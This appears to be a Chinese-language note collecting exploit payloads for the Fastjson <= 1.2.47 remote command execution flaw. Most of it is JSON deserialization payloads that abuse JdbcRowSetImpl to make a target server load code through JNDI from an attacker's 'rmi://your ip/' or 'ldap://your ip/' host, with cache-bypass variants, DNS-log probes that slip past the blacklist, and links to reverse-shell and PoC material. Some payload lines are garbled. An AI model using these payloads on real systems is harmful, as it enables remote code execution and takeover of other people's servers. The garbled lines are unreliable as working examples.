Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法记录
payload
rmi://、ldap:// 可以切换尝试。
param={
"@type": "java.lang.Class",
br / > "a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
"@type": "com.sun.rowset.JdbcRowSetImpl",
br / >
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://your ip/",
"autoCommit": true
}
}
param={
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://your ip/",
"autoCommit":true
}
}
param={"orderNo":"B200414195915053000","partnerOrderNo":"DC200414593341","x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}
param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}}
# JNDI 注入
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your ip/","autoCommit":true}
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/,"autoCommit":true}
# DNS log
param={"@type":"java.net.InetAddress","val":"example.com"}
可以通过 dns log 的方式得知漏洞是否存在了
利用java.net.Inet[4|6]Address
很早之前有一个方法是使用java.net.InetAddress类,现在这个类已经列入黑名单。然而在翻阅fastjson最新版源码(v1.2.67)时,发现两个类没有在黑名单中,于是可以构造了如下payload,即可使fastjson进行DNS解析。下面以java.net.Inet4Address为例分析构造原理。
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
参考
反弹shell
https://blog.csdn.net/Jiajiajiang_/article/details/103255659
复现pyload
https://blog.51cto.com/13770310/2425330?source=dra
靶场
https://vulhub.org/#/environments/fastjson/1.2.24-rce/
教程
https://github.com/shengqi158/fastjson-remote-code-execute-poc
